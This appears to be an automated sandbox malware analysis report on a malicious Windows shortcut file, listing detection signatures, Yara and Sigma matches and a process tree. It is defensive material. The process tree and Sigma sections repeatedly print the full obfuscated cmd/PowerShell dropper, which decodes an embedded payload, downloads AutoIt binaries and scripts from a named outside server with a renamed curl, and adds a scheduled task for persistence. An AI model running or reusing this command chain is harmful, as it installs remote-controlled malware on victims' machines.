Edit tour

Windows Analysis Report
knfV5IVjEV.lnk

Overview

General Information

Sample name:	knfV5IVjEV.lnk (renamed file extension from none to lnk, renamed because original name is a hash value)
Original sample name:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Analysis ID:	1430699
MD5:	9d6c79c0b395cceb83662aa3f7ed0123
SHA1:	65f5f7d127c478522e9669200de20000edcb6cfb
SHA256:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Deletes itself after installation

Found URL in windows shortcut file (LNK)

Machine Learning detection for sample

Obfuscated command line found

Powershell creates an autostart link

Suspicious powershell command line found

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Very long command line found

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected Obfuscated Powershell

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7548 cmdline: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force; MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7680 cmdline: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7732 cmdline: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force; MD5: 04029E121A0CFA5991749937DD22A1D9)

attrib.exe (PID: 7964 cmdline: attrib +h c:\GSlLzFnTov MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

GSlLzFnTov.exe (PID: 7980 cmdline: GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

GSlLzFnTov.exe (PID: 8092 cmdline: GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

schtasks.exe (PID: 8168 cmdline: schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

attrib.exe (PID: 7832 cmdline: attrib +h c:\GSlLzFnTov MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

GSlLzFnTov.exe (PID: 7848 cmdline: GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

GSlLzFnTov.exe (PID: 7884 cmdline: GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

schtasks.exe (PID: 7948 cmdline: schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
knfV5IVjEV.lnk	JoeSecurity_ObfuscatedPowershell	Yara detected Obfuscated Powershell	Joe Security
knfV5IVjEV.lnk	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xa97:$r1: po^w^e^rs^he^l^l

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x354a:$r1: po^w^e^rs^he^l^l 0x4c2a:$r1: po^w^e^rs^he^l^l
00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1bdea:$r1: po^w^e^rs^he^l^l
Process Memory Space: powershell.exe PID: 7548	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x52d6e:$r1: po^w^e^rs^he^l^l 0x54354:$r1: po^w^e^rs^he^l^l 0x54e10:$r1: po^w^e^rs^he^l^l
Process Memory Space: powershell.exe PID: 7548	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4ee83:$b1: ::WriteAllBytes( 0x4f3ee:$b1: ::WriteAllBytes( 0x5314c:$b1: ::WriteAllBytes( 0x547a2:$b1: ::WriteAllBytes( 0x551cd:$b1: ::WriteAllBytes( 0x6a18e:$b1: ::WriteAllBytes( 0x6f765:$b1: ::WriteAllBytes( 0x6fe18:$b1: ::WriteAllBytes( 0xc79cf:$b1: ::WriteAllBytes( 0xc7f35:$b1: ::WriteAllBytes( 0xc96fe:$b1: ::WriteAllBytes( 0xc9c69:$b1: ::WriteAllBytes( 0xd36cd:$b1: ::WriteAllBytes( 0x16377d:$b1: ::WriteAllBytes( 0x163d0a:$b1: ::WriteAllBytes( 0x164421:$b1: ::WriteAllBytes( 0x1649af:$b1: ::WriteAllBytes( 0x16bd80:$b1: ::WriteAllBytes( 0x174ffb:$b1: ::WriteAllBytes( 0x1fda0c:$b1: ::WriteAllBytes( 0x1fdf77:$b1: ::WriteAllBytes(
Process Memory Space: powershell.exe PID: 7732	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x17bc2:$b1: ::WriteAllBytes( 0x1812d:$b1: ::WriteAllBytes( 0x8e680:$b1: ::WriteAllBytes( 0x8ec0d:$b1: ::WriteAllBytes( 0x8f2be:$b1: ::WriteAllBytes( 0xc4848:$b1: ::WriteAllBytes( 0xc4dcf:$b1: ::WriteAllBytes( 0xc5552:$b1: ::WriteAllBytes( 0xc5c76:$b1: ::WriteAllBytes( 0x12d452:$b1: ::WriteAllBytes( 0x12d9bd:$b1: ::WriteAllBytes( 0x195a27:$b1: ::WriteAllBytes( 0x195dca:$b1: ::WriteAllBytes( 0x195ec5:$b1: ::WriteAllBytes( 0x1fa456:$b1: ::WriteAllBytes( 0x1fd8e8:$b1: ::WriteAllBytes( 0x2011c8:$b1: ::WriteAllBytes( 0x203dae:$b1: ::WriteAllBytes( 0x204319:$b1: ::WriteAllBytes( 0x20cab6:$b1: ::WriteAllBytes( 0x20d36d:$b1: ::WriteAllBytes(

Other

Source	Rule	Description	Author	Strings
amsi64_7732.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x50b:$b1: ::WriteAllBytes( 0xc897:$s1: -join 0x6043:$s4: += 0x6105:$s4: += 0xa32c:$s4: += 0xc449:$s4: += 0xc733:$s4: += 0xc879:$s4: += 0xe012:$s4: += 0xe092:$s4: += 0xe158:$s4: += 0xe1d8:$s4: += 0xe3ae:$s4: += 0xe432:$s4: += 0x40ac:$e4: Get-WmiObject 0x429b:$e4: Get-Process 0x42f3:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3", CommandLine: "C:\Windows\System32\cm

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;, CommandLine: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 